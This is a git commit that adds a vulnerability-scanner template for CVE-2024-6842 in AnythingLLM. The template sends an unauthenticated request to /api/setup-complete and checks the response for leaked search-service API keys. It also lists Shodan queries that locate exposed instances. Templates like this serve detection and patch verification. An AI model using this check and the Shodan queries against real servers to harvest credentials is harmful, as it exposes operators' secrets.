Create CVE-2024-6842.yaml

2024-07-31 20:18:01 +09:00 · 2024-07-31 20:18:01 +09:00 · 3f92960f83
parent 28641724a4
commit 3f92960f83
1 changed files with 47 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-6842.yaml
+++ b/http/cves/2024/CVE-2024-6842.yaml
@ -0,0 +1,47 @@
+id: CVE-2024-6842
+
+info:
+  name: AnythingLLM - Exposure sensitive info
+  author: ingbunga, rahaaaiii, asteria121, breakpack, gy741
+  severity: high
+  description: |
+    The /setup-complete API allows any user to access the current settings of AnythingLLM system.
+  impact: An attacker can use the vulnerability to obtain device administrator rights.
+  reference:
+    - Exposure of Sensitive Information to an Unauthorized Actor
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-6842
+    cwe-id: CWE-200
+  metadata:
+    max-request: 1
+    vendor: Mintplex Labs
+    product: anything-llm
+    shodan-query:
+      - http.title:"AnythingLLM"
+      - http.title:"anythingllm"
+  tags: cve,cve2024,unauth,exposure,anything-llm,Mintplex-Labs
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/setup-complete"
+    
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "\"AgentGoogleSearchEngineId\":\""
+          - "\"AgentGoogleSearchEngineKey\":\""
+          - "\"AgentSerperApiKey\":\""
+          - "\"AgentBingSearchApiKey\":\""
+        
+      - type: word
+        words:
+          - "application/json"
+        part: header
+      
+      - type: status
+        status:
+          - 200